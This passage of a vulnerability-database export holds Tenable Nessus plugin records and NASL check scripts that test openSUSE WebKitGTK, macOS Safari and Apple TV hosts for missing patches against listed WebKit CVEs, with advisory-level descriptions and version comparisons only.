\"CVE-2019-6226\", \"CVE-2019-6227\", \"CVE-2019-6229\", \"CVE-2019-6233\", \"CVE-2019-6234\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-308)\");\n script_summary(english:\"Check for the openSUSE-2019-308 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.22.6 fixes the following\nissues (boo#1124937 boo#1119558) :\n\nSecurity vulnerabilities fixed :\n\n - CVE-2018-4437: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling. (boo#1119553)\n\n - CVE-2018-4438: Processing maliciously crafted web\n content may lead to arbitrary code execution. A logic\n issue existed resulting in memory corruption. This was\n addressed with improved state management. (boo#1119554)\n\n - CVE-2018-4441: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling. (boo#1119555)\n\n - CVE-2018-4442: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling. (boo#1119556)\n\n - CVE-2018-4443: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling. (boo#1119557)\n\n - CVE-2018-4464: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling. (boo#1119558)\n\n - CVE-2019-6212: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling.\n\n - CVE-2019-6215: Processing maliciously crafted web\n content may lead to arbitrary code execution. A type\n confusion issue was addressed with improved memory\n handling.\n\n - CVE-2019-6216: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling.\n\n - CVE-2019-6217: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling.\n\n - CVE-2019-6226: Processing maliciously crafted web\n content may lead to arbitrary code execution. Multiple\n memory corruption issues were addressed with improved\n memory handling.\n\n - CVE-2019-6227: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling.\n\n - CVE-2019-6229: Processing maliciously crafted web\n content may lead to universal cross site scripting. A\n logic issue was addressed with improved validation.\n\n - CVE-2019-6233: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling.\n\n - CVE-2019-6234: Processing maliciously crafted web\n content may lead to arbitrary code execution. A memory\n corruption issue was addressed with improved memory\n handling.\n\nOther bug fixes and changes :\n\n - Make kinetic scrolling slow down smoothly when reaching\n the ends of pages, instead of abruptly, to better match\n the GTK+ behaviour.\n\n - Fix Web inspector magnifier under Wayland.\n\n - Fix garbled rendering of some websites (e.g. YouTube)\n while scrolling under X11.\n\n - Fix several crashes, race conditions, and rendering\n issues.\n\nFor a detailed list of changes, please refer to :\n\n- https://webkitgtk.org/security/WSA-2019-0001.html\n\n- https://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\n\n- https://webkitgtk.org/security/WSA-2018-0009.html\n\n- https://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119555\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119557\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1119558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1124937\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/2018/12/13/webkitgtk2.22.5-released.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/2019/02/09/webkitgtk2.22.6-released.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2019-0001.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-minibrowser-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-minibrowser-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.22.6-lp150.2.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.22.6-lp150.2.12.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:27:08", "description": "The version of Apple Safari installed on the remote host is prior to 12.0.2. It is, therefore, affected by the following vulnerabilities :\n\n - Input-validation errors exist that allow memory corruption leading to arbitrary code execution. (CVE-2018-4437, CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464)\n\nNote that other flaws exist that allow information disclosure and address bar spoofing.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-08T00:00:00", "type": "nessus", "title": "Apple Safari < 12.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4464", "CVE-2018-4439", "CVE-2018-4445", "CVE-2018-4440"], "modified": "2019-04-08T00:00:00", "cpe": ["cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*"], "id": "700507.PRM", "href": "https://www.tenable.com/plugins/nnm/700507", "sourceData": "Binary data 700507.prm", "cvss": {"score": 9.3, "vector": "CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:29:55", "description": "The version of Apple Safari installed on the remote macOS or Mac OS X host is prior to 12.0.2. It is, therefore, affected by the following vulnerabilities :\n\n - Input-validation errors exist that allow memory corruption leading to arbitrary code execution.\n (CVE-2018-4437, CVE-2018-4438, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443, CVE-2018-4464)\n\nNote that other flaws exist that allow information disclosure and address bar spoofing.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-07T00:00:00", "type": "nessus", "title": "macOS : Apple Safari < 12.0.2 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4439", "CVE-2018-4440", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4445", "CVE-2018-4464"], "modified": "2019-11-01T00:00:00", "cpe": ["cpe:/a:apple:safari", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SAFARI12_0_2.NASL", "href": "https://www.tenable.com/plugins/nessus/119498", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119498);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-4437\",\n \"CVE-2018-4438\",\n \"CVE-2018-4439\",\n \"CVE-2018-4440\",\n \"CVE-2018-4441\",\n \"CVE-2018-4442\",\n \"CVE-2018-4443\",\n \"CVE-2018-4445\",\n \"CVE-2018-4464\"\n );\n\n script_name(english:\"macOS : Apple Safari < 12.0.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote macOS or Mac OS X\nhost is prior to 12.0.2. It is, therefore, affected by the following\nvulnerabilities :\n\n - Input-validation errors exist that allow memory\n corruption leading to arbitrary code execution.\n (CVE-2018-4437, CVE-2018-4438, CVE-2018-4441,\n CVE-2018-4442, CVE-2018-4443, CVE-2018-4464)\n\nNote that other flaws exist that allow information disclosure and\naddress bar spoofing.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT209344\");\n # https://lists.apple.com/archives/security-announce/2018/Dec/msg00003.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?244b31ab\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 12.0.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4464\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(12|13|14)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"macOS Sierra 10.12 / macOS High Sierra 10.13 / macOS Mojave 10.14\");\n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"12.0.2\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-30T18:21:42", "description": "According to its banner, the version of Apple TV on the remote device is prior to 12.1.1. It is, therefore, affected by multiple vulnerabilities as described in the HT209342 security advisory:\n\n - Multiple elevation of privilege vulnerabilities exist due to improper memory handling. An application can exploit this to gain elevated privileges. (CVE-2018-4303, CVE-2018-4435)\n\n - Multiple unspecified command execution vulnerabilities exist that allow an attacker to execute arbitrary commands, sometimes with kernel privileges. (CVE-2018-4427, CVE-2018-4437, CVE-2018-4438, CVE-2018-4447, CVE-2018-4461, CVE-2018-4464, CVE-2018-4441, CVE-2018-4442, CVE-2018-4443)\n\n - An unspecified denial of service (DoS) vulnerability exists in the Kernel that allows an an attacker in a privileged position to perform a denial of service attack. (CVE-2018-4460)\n\nAdditionally, the version of Apple TV is also affected by several additional vulnerabilities including cross-site scripting (XSS) and an information disclosure vulnerability.\n\nNote that only 4th generation devices are affected by these vulnerabilities.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-21T00:00:00", "type": "nessus", "title": "Apple TV < 12.1.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4303", "CVE-2018-4427", "CVE-2018-4431", "CVE-2018-4435", "CVE-2018-4436", "CVE-2018-4437", "CVE-2018-4438", "CVE-2018-4441", "CVE-2018-4442", "CVE-2018-4443", "CVE-2018-4447", "CVE-2018-4460", "CVE-2018-4461", "CVE-2018-4464", "CVE-2018-4465"], "modified": "2022-05-26T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_12_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/119839", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119839);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/26\");\n\n script_cve_id(\n \"CVE-2018-4303\",\n \"CVE-2018-4431\",\n \"CVE-2018-4435\",\n \"CVE-2018-4436\",\n \"CVE-2018-4437\",\n \"CVE-2018-4438\",\n \"CVE-2018-4441\",\n \"CVE-2018-4442\",\n \"CVE-2018-4443\",\n \"CVE-2018-4447\",\n \"CVE-2018-4460\",\n \"CVE-2018-4461\",\n \"CVE-2018-4464\",\n \"CVE-2018-4465\"\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2018-12-05-3\");\n\n script_name(english:\"Apple TV < 12.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 12.1.1. It is, therefore, affected by multiple\nvulnerabilities as described in the HT209342 security advisory:\n\n - Multiple elevation of privilege vulnerabilities exist due to\n improper memory handling. An application can exploit this to gain\n elevated privileges. (CVE-2018-4303, CVE-2018-4435)\n\n - Multiple unspecified command execution vulnerabilities exist that\n allow an attacker to execute arbitrary commands, sometimes with\n kernel privileges. (CVE-2018-4427, CVE-2018-4437, CVE-2018-4438,\n CVE-2018-4447, CVE-2018-4461, CVE-2018-4464, CVE-2018-4441,\n CVE-2018-4442, CVE-2018-4443)\n\n - An unspecified denial of service (DoS) vulnerability exists in\n the Kernel that allows an an attacker in a privileged position to\n perform a denial of service attack. (CVE-2018-4460)\n\nAdditionally, the version of Apple TV is also affected by several\nadditional vulnerabilities including cross-site scripting (XSS) and\nan information disclosure vulnerability.\n\nNote that only 4th generation devices are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT209342\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 12.1.1 or later. Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4465\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-4464\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"16K45\";\ntvos_ver = '12.1.1';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : 4,\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_HOLE\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:51", "description": "This update for webkit2gtk3 to version 2.22.6 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-6212: Fixed multiple memory corruption vulnerabilities which could allow arbitrary code execution during the processing of special crafted web-content.\n\n - CVE-2019-6215: Fixed a type confusion vulnerability which could allow arbitrary code execution during the processing of special crafted web-content.\n\n - CVE-2019-6216: Fixed multiple memory corruption vulnerabilities which could allow arbitrary code execution during the processing of special crafted web-content. \n\n - CVE-2019-6217: Fixed multiple memory corruption vulnerabilities which could allow arbitrary code execution during the processing of special crafted web-content. \n\n - CVE-2019-6226: Fixed multiple memory corruption vulnerabilities which could allow arbitrary code execution during the processing of special crafted web-content. \n\n - CVE-2019-6227: Fixed a memory corruption vulnerability which could allow arbitrary code execution during the processing of special crafted web-content.\n\n - CVE-2019-6229: Fixed a logic issue by improving validation which could allow arbitrary code execution during the processing of special crafted web-content.\n\n - CVE-2019-6233: Fixed a memory corruption vulnerability which could allow arbitrary code execution during the processing of special crafted web-content.\n\n - CVE-2019-6234: Fixed a memory corruption vulnerability which could allow arbitrary code execution during the processing of special crafted web-content.\n\nOther issues addressed :\n\n - Update to version 2.22.6 (bsc#1124937).\n\n - Kinetic scrolling slow down smoothly when reaching the ends of pages, instead of abruptly, to better match the GTK+ behaviour.\n\n - Fixed Web inspector magnifier under Wayland.\n\n - Fixed garbled rendering of some websites (e.g. YouTube) while scrolling under X11.\n\n - Fixed several crashes, race conditions, and rendering issues.\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-11T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-309)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", 